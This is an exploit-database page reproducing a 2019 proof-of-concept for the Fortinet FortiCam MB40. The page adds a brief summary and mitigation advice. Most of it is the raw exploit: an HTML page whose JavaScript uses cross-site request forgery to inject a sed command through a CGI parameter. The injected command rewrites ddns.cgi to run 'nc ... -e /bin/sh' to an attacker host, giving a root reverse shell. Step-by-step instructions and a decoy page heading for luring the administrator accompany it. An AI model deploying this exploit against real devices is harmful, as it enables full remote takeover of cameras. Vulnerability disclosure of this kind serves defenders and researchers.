header-logo
Suggest Exploit
vendor:
FortiCam MB40
by:
Aaron Blair (@xorcat)
8.8
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: FortiCam MB40
Affected Version From: v1.2.0.0
Affected Version To: v1.2.0.0
Patch Exists: YES
Related CWE: TBA
CPE: h:fortinet:forticam_mb40
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2019

FCM-MB40 Remote Command Execution as Root via CSRF

This exploit allows an attacker to execute arbitrary commands as root on a Fortinet FortiCam MB40 device. The exploit works by using a crafted HTML document that contains a malicious JavaScript code. The code creates an image element with a URL that contains a command injection payload. This payload is then executed when the URL is requested. The command injection payload is used to create a reverse shell from the device to the attacker's host, allowing the attacker to execute arbitrary commands as root.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the device is running the latest version of the firmware. Additionally, users should ensure that the device is not exposed to the public internet and that access to the device is restricted to trusted users.
Source

Exploit-DB raw data:

# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA

<html>
    <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) 

Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

Follow the following steps to demonstrate this PoC:

1. Replace IP addresses in Javascript code to repr	esent your testing
   environment.
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
   1337`
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
   * Note: all modern browsers will cache Basic Authentication
     credentials (such as those used by the FCM-MB40) even if the
     FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
browser. 
   * Note: In an attack scenario, this step would be performed by
     implanting the code into a legitimate webpage that the "admin"
     user visits, or by tricking the "admin" user into opening a page
     which includes the code.
5. Note that the `netcat` listener established in step 2. has received
   a connection from the camera, and that it is presenting a `/bin/sh`
   session as root.
   * Note: type `id` in the `netcat` connection to verify this.

_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
modification._
-->
    <head>
        <script>
const sleep = (milliseconds) => {
    return new Promise(resolve => setTimeout(resolve, milliseconds))
};
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';

var sed_img = document.createElement("img");
sed_img.src = sed_url;

sleep(400).then(() => {
    var execute_img = document.createElement("img");
    execute_img.src = execute_url;
});
        </script>
    </head>
    <body>
        <h1>Welcome to my non-malicious website.</h1>
    </body>
</html>

Navigation

Suggest Exploit

Services By CQR